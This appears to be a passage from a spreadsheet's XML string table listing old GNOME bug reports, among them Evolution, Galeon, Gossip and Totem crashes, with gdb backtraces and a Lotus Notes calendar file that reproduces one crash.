libgal2.0_3-1.99.8-0.ximian.6.3
libgal2.2_0-2.1.0.99.0.200312020530-0.snap.ximian.6.1
gtkhtml-1.1.8-5
gtkhtml3.0-3.0.9-0.ximian.6.1
gtkhtml3.1-3.1.2.0.200312020530-0.snap.ximian.6.1
gal-0.23-1
pilot-link-0.11.5-4
gnome-pilot-0.1.71-2
gnome-mime-data-2.2.0-1
gtk+-1.2.10-25
gtk2-2.2.1-4
bonobo-1.0.22-4
libbonoboui-2.4.1-0.ximian.6.1
libbonobo-2.4.2-0.ximian.6.2
libgnomecanvas-2.2.0.1-1
ORBit2-2.9.0-0.ximian.6.1</t>
  </si>
  <si>
    <t>GDK-PIXBUF-70971</t>
  </si>
  <si>
    <t>Rendering artifacts in bilinear scaling</t>
  </si>
  <si>
    <t>The recent changes to pixops seem to produce artifacts when using bilinear
scaling.  See a screenshot here:
    http://primates.ximian.com/~dobey/crappity-crap-pixops.png
This happens when using bilinear interpolation with a zoom factor smaller
than 1.0.  It seems to happen on areas of a solid color.  This is pretty
easy to test with the attached trivial black image. Open it in EOG select
bilinear scaling and zoom out a bit.  You'll see massive white artifacts.</t>
  </si>
  <si>
    <t>NAUTILUS-89069</t>
  </si>
  <si>
    <t>DND to tree view</t>
  </si>
  <si>
    <t>See https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=69806</t>
  </si>
  <si>
    <t>YELP-340173</t>
  </si>
  <si>
    <t>Doesn't handle manual page inclusion</t>
  </si>
  <si>
    <t>In yelp the bzcmp(1) manual page appears empty. The manual page itself looks like this:
12:20 joss@utena ~ &gt; zcat /usr/share/man/man1/bzcmp.1.gz
.so man1/bzdiff.1
When directly invoking the bzdiff(1) manual page it renders fine.</t>
  </si>
  <si>
    <t>EVOLUTION-502178</t>
  </si>
  <si>
    <t>Mail title encoding isn't correctly decoded</t>
  </si>
  <si>
    <t>Please describe the problem:
Hi
Evolution doesn't decode very well mail titles. To be honest the encoding is probably not following the RFC to the letter but hey any other mailer manages to display them properly so I think a bugfix is long overdue.
Steps to reproduce:
Try to find someone sending you mail from a broken mailer. I'll submit some samples.
Actual results:
Expected results:
Does this happen every time?
It does heppen only on some particular mails.
Other information:</t>
  </si>
  <si>
    <t>GALEON-59874</t>
  </si>
  <si>
    <t>Galeon crashed</t>
  </si>
  <si>
    <t xml:space="preserve">Package: galeon
Severity: normal
Version: 0.11.5
Synopsis: Galeon crashed
Bugzilla-Product: galeon
Bugzilla-Component: User interface
Description:
Galeon crashed when using settings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ew Thread 1024 (LWP 772)]
[New Thread 2049 (LWP 780)]
[New Thread 1026 (LWP 781)]
[New Thread 2051 (LWP 782)]
[New Thread 3076 (LWP 784)]
0x40871549 in __wait4 () from /lib/libc.so.6
#0  0x40871549 in __wait4 () from /lib/libc.so.6
#1  0x408ea900 in __DTOR_END__ () from /lib/libc.so.6
#2  0x4066159f in waitpid (pid=791 stat_loc=0xbfffec44 options=0)
    at wrapsyscall.c:173
#3  0x401c68fa in gnome_segv_handle () at eval.c:88
#4  0x4065f304 in pthread_sighandler (signo=11 ctx={gs = 0 __gsh = 0 
      fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 4094 
      esi = 142418632 ebp = 3221221372 esp = 3221221348 ebx = 0 edx = 2 
      ecx = 135197988 eax = 0 trapno = 14 err = 4 eip = 134688298 
      cs = 35 __csh = 0 eflags = 66178 esp_at_signal = 3221221348 ss = 43 
      __ssh = 0 fpstate = 0xbfffed68 oldmask = 2147483648 cr2 = 0})
    at signals.c:97
#5  
#6  0x8072e2a in bookmarks_toolbars_recreate () at eval.c:88
#7  0x8072e62 in bookmarks_toolbars_recreate () at eval.c:88
#8  0x8072d81 in bookmarks_toolbars_create () at eval.c:88
#9  0x8077194 in window_create () at eval.c:88
#10 0x8076c37 in window_create () at eval.c:88
#11 0x8074199 in embed_create () at eval.c:88
#12 0x8074241 in embed_create_from_url () at eval.c:88
#13 0x80a0a97 in impl_Galeon_Browser__create () at eval.c:88
#14 0x80a13a4 in _ORBIT_skel_Galeon_Browser_loadurl () at eval.c:88
#15 0x405c1ef9 in ORBit_POA_handle_request (recv_buffer=0x8121fc8 
    poa=0x810c788) at orbit_poa.c:507
#16 0x405c5343 in ORBit_handle_incoming_request (recv_buffer=0x8121fc8)
    at server.c:90
#17 0x405c5694 in ORBit_handle_incoming_message (recv_buffer=0x8121fc8)
    at server.c:160
#18 0x405dfda9 in giop_main_handle_connection (connection=0x8237898)
    at connection.c:1211
#19 0x40764160 in orb_handle_connection (source=0x854f2c0 cond=G_IO_IN 
    cnx=0x8237898) at oaf-mainloop.c:69
#20 0x4054c139 in g_io_unix_dispatch () at eval.c:88
#21 0x4054d8f6 in g_main_dispatch () at eval.c:88
#22 0x4054df13 in g_main_iterate () at eval.c:88
#23 0x4054dfd1 in g_main_iteration () at eval.c:88
#24 0x4031456d in gtk_main_iteration () at eval.c:88
#25 0x809db45 in session_quit_cb () at eval.c:88
#26 0x809da0f in session_quit () at eval.c:88
#27 0x8079a34 in window_delete_cb () at eval.c:88
#28 0x40315a6e in gtk_marshal_BOOL__POINTER () at eval.c:88
#29 0x40347155 in gtk_handlers_run () at eval.c:88
#30 0x4034654d in gtk_signal_real_emit () at eval.c:88
#31 0x40344505 in gtk_signal_emit () at eval.c:88
#32 0x4037dd1c in gtk_widget_event () at eval.c:88
#33 0x40314885 in gtk_main_do_event () at eval.c:88
#34 0x41020b02 in NSGetModule ()
   from /usr/lib/mozilla/components/libwidget_gtk.so
#35 0x403d2b23 in gdk_event_dispatch () at eval.c:88
#36 0x4054d8f6 in g_main_dispatch () at eval.c:88
#37 0x4054df13 in g_main_iterate () at eval.c:88
#38 0x4054e0cc in g_main_run () at eval.c:88
#39 0x40314300 in gtk_main () at eval.c:88
#40 0x8088368 in main () at eval.c:88
#41 0x407e4f1b in __libc_start_main (main=0x8088130  argc=1 
    ubp_av=0xbffffb24 init=0x8062b24  fini=0x80aea74  
    rtld_fini=0x4000c1b0  stack_end=0xbffffb1c)
    at ../sysdeps/generic/libc-start.c:129
#0  0x40871549 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x408ea900 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x4066159f in waitpid (pid=791 stat_loc=0xbfffec44 options=0)
    at wrapsyscall.c:173
stat_loc = (int *) 0xbfffec44
options = 0
result = 0
oldtype = 0
#3  0x401c68fa in gnome_segv_handle () at eval.c:88
No locals.
#4  0x4065f304 in pthread_sighandler (signo=11 ctx={gs = 0 __gsh = 0 
      fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 4094 
      esi = 142418632 ebp = 3221221372 esp = 3221221348 ebx = 0 edx = 2 
      ecx = 135197988 eax = 0 trapno = 14 err = 4 eip = 134688298 
      cs = 35 __csh = 0 eflags = 66178 esp_at_signal = 3221221348 ss = 43 
      __ssh = 0 fpstate = 0xbfffed68 oldmask = 2147483648 cr2 = 0})
    at signals.c:97
self = 0x40667e00
in_sighandler = 0x0
#5  
No locals.
#6  0x8072e2a in bookmarks_toolbars_recreate () at eval.c:88
No locals.
#7  0x8072e62 in bookmarks_toolbars_recreate () at eval.c:88
88	in eval.c
No locals.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-01 09:30 -------
The original reporter (papyrus@home.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component mpeseng@tin.it.
</t>
  </si>
  <si>
    <t>papyrus</t>
  </si>
  <si>
    <t>GCONF-59518</t>
  </si>
  <si>
    <t>gconftool --shutdown starts gconfd</t>
  </si>
  <si>
    <t>Because it calls gconf_engine_get_default()</t>
  </si>
  <si>
    <t>GOSSIP-346496</t>
  </si>
  <si>
    <t>gossip crashes when arriving unicode links</t>
  </si>
  <si>
    <t>Please describe the problem:
I use gossip from cvs HEAD. When I arrive a link with non-ascii chars gossip crashes. 
Steps to reproduce:
1. Receive a message with a link like this: http://www.test.com/Ã¤
Actual results:
Gossip crashes
Expected results:
Does this happen every time?
yes also with Ã­ etc
Other information:
Backtrace was generated from '/opt/bleedingedge/bin/gossip'
Using host libthread_db library /lib/libthread_db.so.1.
[Thread debugging using libthread_db enabled]
[New Thread 805560848 (LWP 26486)]
0x0ec21c58 in __waitpid_nocancel () from /lib/libpthread.so.0
#0  0x0ec21c58 in __waitpid_nocancel () from /lib/libpthread.so.0
#1  0x0fedc618 in libgnomeui_module_info_get ()
   from /usr/lib/libgnomeui-2.so.0
#2  
#3  0x0eb8a514 in g_markup_escape_text () from /usr/lib/libglib-2.0.so.0
#4  0x1003fd3c in log_urlify (msg=0x104d6f30 www.test.com/ÃƒÂ¤)
    at gossip-log.c:997
#5  0x10040ea8 in gossip_log_message_for_contact (message=0x1042da50 
    incoming=0) at gossip-log.c:1569
#6  0x1004e484 in private_chat_input_key_press_event_cb (
    widget= event= 
    chat=) at gossip-private-chat.c:358
#7  0x0fa60e4c in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
#8  0x0ec9e720 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#9  0x0ecb3048 in g_signal_stop_emission () from /usr/lib/libgobject-2.0.so.0
#10 0x0ecb3fd4 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#11 0x0ecb46fc in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#12 0x0fb82a44 in gtk_widget_activate () from /usr/lib/libgtk-x11-2.0.so.0
#13 0x0fb965dc in gtk_window_propagate_key_event ()
   from /usr/lib/libgtk-x11-2.0.so.0
#14 0x0fb9c014 in gtk_window_activate_key () from /usr/lib/libgtk-x11-2.0.so.0
#15 0x0fa60e4c in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
#16 0x0ec9de3c in g_cclosure_new_swap () from /usr/lib/libgobject-2.0.so.0
#17 0x0ec9e720 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#18 0x0ecb2c58 in g_signal_stop_emission () from /usr/lib/libgobject-2.0.so.0
#19 0x0ecb3fd4 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#20 0x0ecb46fc in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#21 0x0fb82a44 in gtk_widget_activate () from /usr/lib/libgtk-x11-2.0.so.0
#22 0x0fa5ed38 in gtk_propagate_event () from /usr/lib/libgtk-x11-2.0.so.0
#23 0x0fa5f168 in gtk_main_do_event () from /usr/lib/libgtk-x11-2.0.so.0
#24 0x0f8741ac in _gdk_events_queue () from /usr/lib/libgdk-x11-2.0.so.0
#25 0x0eb84684 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#26 0x0eb88a7c in g_main_context_check () from /usr/lib/libglib-2.0.so.0
#27 0x0eb88ed4 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#28 0x0fa5df48 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#29 0x10045688 in main (argc= 
    argv=) at gossip-main.c:182
Thread 1 (Thread 805560848 (LWP 26486)):
#0  0x0ec21c58 in __waitpid_nocancel () from /lib/libpthread.so.0
No symbol table info available.
#1  0x0fedc618 in libgnomeui_module_info_get ()
   from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#2  
No symbol table info available.
#3  0x0eb8a514 in g_markup_escape_text () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0x1003fd3c in log_urlify (msg=0x104d6f30 www.test.com/ÃƒÂ¤)
    at gossip-log.c:997
	last = 
	s = 0
	e = 14
	tmp = 
	num_matches = 1
	i = 1
	start = (GArray *) 0x10435f80
	end = (GArray *) 0x102ead98
	ret = (GString *) 0x10480030
	esc = (gchar *) 0x104d6f30 www.test.com/ÃƒÂ¤
#5  0x10040ea8 in gossip_log_message_for_contact (message=0x1042da50 
    incoming=0) at gossip-log.c:1569
	contact = (GossipContact *) 0x102f3198
	own_contact = (GossipContact *) 0x102d3e08
	own_contact_saved = 
	filename = 
	file = 
	to_or_from = (const gchar *) 0x10088b18 to
	timestamp = 
	body = 
	resource = 
	name = 
	contact_id = 
	body_str = (const gchar *) 0x104d6f30 www.test.com/ÃƒÂ¤
	new_file = 
	__PRETTY_FUNCTION__ = gossip_log_message_for_contact
#6  0x1004e484 in private_chat_input_key_press_event_cb (
    widget= event= 
    chat=) at gossip-private-chat.c:358
	priv = 
	adj = 
	val = 
#7  0x0fa60e4c in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#8  0x0ec9e720 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#9  0x0ecb3048 in g_signal_stop_emission () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#10 0x0ecb3fd4 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#11 0x0ecb46fc in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#12 0x0fb82a44 in gtk_widget_activate () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#13 0x0fb965dc in gtk_window_propagate_key_event ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#14 0x0fb9c014 in gtk_window_activate_key () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#15 0x0fa60e4c in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#16 0x0ec9de3c in g_cclosure_new_swap () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#17 0x0ec9e720 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#18 0x0ecb2c58 in g_signal_stop_emission () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#19 0x0ecb3fd4 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#20 0x0ecb46fc in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#21 0x0fb82a44 in gtk_widget_activate () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#22 0x0fa5ed38 in gtk_propagate_event () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#23 0x0fa5f168 in gtk_main_do_event () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#24 0x0f8741ac in _gdk_events_queue () from /usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#25 0x0eb84684 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#26 0x0eb88a7c in g_main_context_check () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#27 0x0eb88ed4 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#28 0x0fa5df48 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#29 0x10045688 in main (argc= 
    argv=) at gossip-main.c:182
	program = (GnomeProgram *) 0x100ae428
	session = (GossipSession *) 0x100df060
	account_manager = (GossipAccountManager *) 0x100afe00
	account = (GossipAccount *) 0x0
	context = (GOptionContext *) 0x100a62a0
	accounts = 
#0  0x0ec21c58 in __waitpid_nocancel () from /lib/libpthread.so.0</t>
  </si>
  <si>
    <t>GNOMORADIO-97793</t>
  </si>
  <si>
    <t>segfault when next/prev is pressed and the player is stopped</t>
  </si>
  <si>
    <t>yeah this ain't good</t>
  </si>
  <si>
    <t>TOTEM-314489</t>
  </si>
  <si>
    <t>Totem crashes on second audio CD</t>
  </si>
  <si>
    <t>Version details: 1.1.4
Distribution/Version: Fedora Rawhide
Whenever I play an audio CD in totem then eject it and try to play a second
one totem segfaults.  Attached is a backtrace.  It seems like totem is
confusing itself as it says it cannot get exclusive access but when running
lsof I see:
[root@codewarrior ~]# lsof /dev/hdc
COMMAND PID  USER   FD   TYPE DEVICE SIZE NODE NAME
totem   952 skadz   29u   BLK   220       553 /dev/hdc</t>
  </si>
  <si>
    <t>EVOLUTION-269451</t>
  </si>
  <si>
    <t>Evo crashes opening recurring appointment sent from Lotus Notes</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Debian 3.1
Package: Evolution
Priority: Normal
Version: GNOME2.8.0 2.0.2
Gnome-Distributor: Debian
Synopsis: Evo crashes opening recurring appointment sent from Lotus Notes
Bugzilla-Product: Evolution
Bugzilla-Component: Calendar
Bugzilla-Version: 2.0.2
BugBuddy-GnomeVersion: 2.0 (2.8.0)
Description:
Description of the crash:
I sent a recurring appointment (with a custom recurrence rule) from
Lotus Notes 6.5 to Evolution 2.0.2.  In Evo I accept the appointment
and it is entered into my calendar but when I try to open the calendar
entry and see details about the appointment Evo crashes.
Steps to reproduce the crash:
1. Send a recurring appointment from Lotus Notes to Evolution
2. Open the appointment in Evolution
3. 
Expected Results:
Evo should open the appointment and display details about it.
How often does this happen?
I've tried it twice with two appointments and Evo has crashed both
times.
Additional Information:
Here's the ICS file generated by Lotus Notes which causes the crash:
BEGIN:VCALENDAR
X-LOTUS-CHARSET:UTF-8
VERSION:2.0
PRODID:-//Lotus Development Corporation//NONSGML Notes 6.0//EN
METHOD:REQUEST
BEGIN:VTIMEZONE
TZID:US Eastern/SA Pacific
BEGIN:STANDARD
DTSTART:19500101T020000
TZOFFSETFROM:-0500
TZOFFSETTO:-0500
END:STANDARD
END:VTIMEZONE
BEGIN:VEVENT
DTSTARTTZID=US Eastern/SA Pacific:20041113T113000
DTENDTZID=US Eastern/SA Pacific:20041113T123000
TRANSP:OPAQUE
RDATEVALUE=PERIOD:20041113T163000Z/20041113T173000Z
 20041120T163000Z/20041120T173000Z20041127T163000Z/20041127T173000Z
DTSTAMP:20041113T162121Z
SEQUENCE:0
ATTENDEEROLE=CHAIRPARTSTAT=ACCEPTEDCN=Jane Doe/Somewhere/MYCO
 RSVP=FALSE:mailto:janedoe@myco.com
ATTENDEEROLE=REQ-PARTICIPANTPARTSTAT=NEEDS-ACTIONRSVP=TRUE
 :mailto:tlau-ximian@tlau.org
CLASS:PUBLIC
SUMMARY:Test from notes
ORGANIZERCN=Jane Doe/Somewhere/MYCO:mailto:janedoe@myco.com
UID:5963AD195CC691ED85256F4B0059BA66-Lotus_Notes_Generated
X-LOTUS-BROADCAST:FALSE
X-LOTUS-UPDATE-SEQ:1
X-LOTUS-UPDATE-WISL:$S:1$L:1$B:1$R:1$E:1
X-LOTUS-NOTESVERSION:2
X-LOTUS-NOTICETYPE:I
X-LOTUS-CHILD_UID:5963AD195CC691ED85256F4B0059BA66
END:VEVENT
END:VCALENDAR
Debugging Information:
Backtrace was generated from '/usr/bin/evolution'
(no debugging symbols found)...Using host libthread_db library
/lib/tls/libthread_db.so.1.
(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Thread debugging using
libthread_db enabled]
[New Thread 1092347008 (LWP 1971)]
[New Thread 1212652464 (LWP 2108)]
[Thread debugging using libthread_db enabled]
[New Thread 1092347008 (LWP 1971)]
[New Thread 1212652464 (LWP 2108)]
(no debugging symbols found)...[New Thread 1128766384 (LWP 2052)]
(no debugging symbols found)...[New Thread 1137154992 (LWP 2051)]
(no debugging symbols found)...[New Thread 1153932208 (LWP 2048)]
(no debugging symbols found)...[New Thread 1162320816 (LWP 2045)]
(no debugging symbols found)...[New Thread 1179098032 (LWP 2044)]
(no debugging symbols found)...[New Thread 1170709424 (LWP 2043)]
(no debugging symbols found)...[New Thread 1111595952 (LWP 1981)]
(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Thread debugging using libthread_db enabled]
[New Thread 1092347008 (LWP 1971)]
[New Thread 1212652464 (LWP 2108)]
(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0x40e27431 in __waitpid_nocancel () from
/lib/tls/libpthread.so.0
#0  0x40e27431 in __waitpid_nocancel () from /lib/tls/libpthread.so.0
#1  0x40465434 in libgnomeui_module_info_get ()
   from /usr/lib/libgnomeui-2.so.0
#2  
#3  0x41039ed9 in raise () from /lib/tls/libc.so.6
#4  0x41147fcc in ?? () from /lib/tls/libc.so.6
#5  0x094c6690 in ?? ()
#6  0x4103b771 in abort () from /lib/tls/libc.so.6
#7  0x00000000 in ?? ()
#8  0x00000020 in ?? ()
#9  0x00000000 in ?? ()
#10 0x00000000 in ?? ()
#11 0x00000000 in ?? ()
#12 0x00000000 in ?? ()
#13 0x00000000 in ?? ()
#14 0x00000000 in ?? ()
#15 0x00000000 in ?? ()
#16 0x00000000 in ?? ()
#17 0x00000000 in ?? ()
#18 0x00000000 in ?? ()
#19 0x00000000 in ?? ()
#20 0x00000000 in ?? ()
#21 0x00000000 in ?? ()
#22 0x00000000 in ?? ()
#23 0x00000000 in ?? ()
#24 0x00000000 in ?? ()
#25 0x00000000 in ?? ()
#26 0x00000000 in ?? ()
#27 0x00000000 in ?? ()
#28 0x00000000 in ?? ()
#29 0x00000000 in ?? ()
#30 0x00000000 in ?? ()
#31 0x00000000 in ?? ()
#32 0x00000000 in ?? ()
#33 0x00000000 in ?? ()
#34 0x00000000 in ?? ()
#35 0x00000000 in ?? ()
#36 0x00000000 in ?? ()
#37 0x00000000 in ?? ()
#38 0x00000000 in ?? ()
#39 0x00000000 in ?? ()
#40 0x00000000 in ?? ()
#41 0x0f65aae5 in ?? ()
#42 0x400cb270 in ?? ()
#43 0x40113bc7 in ?? () from /usr/lib/libecal.so.6
#44 0x00000000 in ?? ()
#45 0x00000001 in ?? ()
#46 0x0000000b in ?? ()
#47 0xbfffef14 in ?? ()
#48 0x4010a408 in ?? () from /usr/lib/libecal.so.6
#49 0x400cb270 in ?? ()
#50 0x40016c00 in ?? () from /lib/ld-linux.so.2
#51 0x00008dd3 in ?? ()
#52 0x400cb270 in ?? ()
#53 0xbfffef40 in ?? ()
#54 0x4000ba16 in _dl_map_object_deps () from /lib/ld-linux.so.2
#55 0x40136ad0 in e_cal_component_set_due () from /usr/lib/libecal.so.6
#56 0x40139129 in e_cal_component_set_rdate_list () from
/usr/lib/libecal.so.6
#57 0x41ab1dac in recurrence_page_get_type ()
   from /usr/lib/evolution/2.0/components/libevolution-calendar.so
#58 0x41ab21c7 in recurrence_page_get_type ()
   from /usr/lib/evolution/2.0/components/libevolution-calendar.so
#59 0x41ab4906 in recurrence_page_get_type ()
   from /usr/lib/evolution/2.0/components/libevolution-calendar.so
#60 0x41ab3b8b in recurrence_page_get_type ()
   from /usr/lib/evolution/2.0/components/libevolution-calendar.so
#61 0x41aa5164 in comp_editor_page_fill_widgets ()
   from /usr/lib/evolution/2.0/components/libevolution-calendar.so
#62 0x41aa32bc in comp_editor_get_e_cal ()
   from /usr/lib/evolution/2.0/components/libevolution-calendar.so
#63 0x41aa36f9 in comp_editor_get_e_cal ()
   from /usr/lib/evolution/2.0/components/libevolution-calendar.so
#64 0x41aa8a3f in event_editor_construct ()
   from /usr/lib/evolution/2.0/components/libevolution-calendar.so
#65 0x41aa3aef in comp_editor_edit_comp ()
   from /usr/lib/evolution/2.0/components/libevolution-calendar.so
#66 0x41a2f83e in e_calendar_view_edit_appointment ()
   from /usr/lib/evolution/2.0/components/libevolution-calendar.so
#67 0x41a463fe in e_day_view_convert_time_to_position ()
   from /usr/lib/evolution/2.0/components/libevolution-calendar.so
#68 0x41a45a28 in e_day_view_convert_time_to_position ()
   from /usr/lib/evolution/2.0/components/libevolution-calendar.so
#69 0x41a4550c in e_day_view_convert_time_to_position ()
   from /usr/lib/evolution/2.0/components/libevolution-calendar.so
#70 0x40b67934 in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
#71 0x40f58c20 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#72 0x40f6cc25 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#73 0x40f6b9be in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#74 0x40f6bee4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#75 0x40c66957 in gtk_widget_send_expose () from
/usr/lib/libgtk-x11-2.0.so.0
#76 0x40b65ed2 in gtk_propagate_event () from
/usr/lib/libgtk-x11-2.0.so.0
#77 0x40b64c26 in gtk_main_do_event () from
/usr/lib/libgtk-x11-2.0.so.0
#78 0x40e80185 in _gdk_events_queue () from
/usr/lib/libgdk-x11-2.0.so.0
#79 0x40fb4b92 in g_main_depth () from /usr/lib/libglib-2.0.so.0
#80 0x40fb5c88 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#81 0x40fb5fc0 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#82 0x40fb6603 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#83 0x407523c8 in bonobo_main () from /usr/lib/libbonobo-2.so.0
#84 0x0806677e in main ()
Thread 9 (Thread 1111595952 (LWP 1981)):
#0  0x410e3d25 in poll () from /lib/tls/libc.so.6
No symbol table info available.
#1  0x40fb6b06 in g_main_loop_get_context () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#2  0x40fb5f40 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0x40fb6603 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0x408c4eb2 in link_thread_io_context () from
/usr/lib/libORBit-2.so.0
No symbol table info available.
#5  0x40fcfbad in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#6  0x40e219b4 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#7  0x00000000 in ?? ()
No symbol table info available.
Thread 8 (Thread 1170709424 (LWP 2043)):
#0  0x40e24115 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0x40090744 in e_msgport_wait () from
/usr/lib/evolution/2.0/libeutil.so.0
No symbol table info available.
#2  0x40090ff7 in e_thread_busy () from
/usr/lib/evolution/2.0/libeutil.so.0
No symbol table info available.
#3  0x40e219b4 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#4  0x00000000 in ?? ()
No symbol table info available.
Thread 7 (Thread 1179098032 (LWP 2044)):
#0  0x40e24115 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0x40090744 in e_msgport_wait () from
/usr/lib/evolution/2.0/libeutil.so.0
No symbol table info available.
#2  0x40090ff7 in e_thread_busy () from
/usr/lib/evolution/2.0/libeutil.so.0
No symbol table info available.
#3  0x40e219b4 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#4  0x00000000 in ?? ()
No symbol table info available.
Thread 6 (Thread 1162320816 (LWP 2045)):
#0  0x40e24115 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0x40090744 in e_msgport_wait () from
/usr/lib/evolution/2.0/libeutil.so.0
No symbol table info available.
#2  0x40090ff7 in e_thread_busy () from
/usr/lib/evolution/2.0/libeutil.so.0
No symbol table info available.
#3  0x40e219b4 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#4  0x00000000 in ?? ()
No symbol table info available.
Thread 5 (Thread 1153932208 (LWP 2048)):
#0  0x40e24115 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0x40090744 in e_msgport_wait () from
/usr/lib/evolution/2.0/libeutil.so.0
No symbol table info available.
#2  0x40090ff7 in e_thread_busy () from
/usr/lib/evolution/2.0/libeutil.so.0
No symbol table info available.
#3  0x40e219b4 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#4  0x00000000 in ?? ()
No symbol table info available.
Thread 4 (Thread 1137154992 (LWP 2051)):
#0  0x40e24115 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0x40090744 in e_msgport_wait () from
/usr/lib/evolution/2.0/libeutil.so.0
No symbol table info available.
#2  0x40090ff7 in e_thread_busy () from
/usr/lib/evolution/2.0/libeutil.so.0
No symbol table info available.
#3  0x40e219b4 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#4  0x00000000 in ?? ()
No symbol table info available.
Thread 3 (Thread 1128766384 (LWP 2052)):
#0  0x40e24115 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0x40090744 in e_msgport_wait () from
/usr/lib/evolution/2.0/libeutil.so.0
No symbol table info available.
#2  0x40090ff7 in e_thread_busy () from
/usr/lib/evolution/2.0/libeutil.so.0
No symbol table info available.
#3  0x40e219b4 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#4  0x00000000 in ?? ()
No symbol table info available.
Thread 2 (Thread 1212652464 (LWP 2108)):
#0  0x410e3d25 in poll () from /lib/tls/libc.so.6
No symbol table info available.
#1  0x40fb6b06 in g_main_loop_get_context () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#2  0x40fb5f40 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0x40fb6603 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0x41759822 in e_book_get_addressbooks () from
/usr/lib/libebook.so.8
No symbol table info available.
#5  0x40e219b4 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#6  0x00000000 in ?? ()
No symbol table info available.
Thread 1 (Thread 1092347008 (LWP 1971)):
#0  0x40e27431 in __waitpid_nocancel () from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0x40465434 in libgnomeui_module_info_get ()
   from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#2  
No symbol table info available.
#3  0x41039ed9 in raise () from /lib/tls/libc.so.6
No symbol table info available.
#4  0x41147fcc in ?? () from /lib/tls/libc.so.6
No symbol table info available.
#5  0x094c6690 in ?? ()
No symbol table info available.
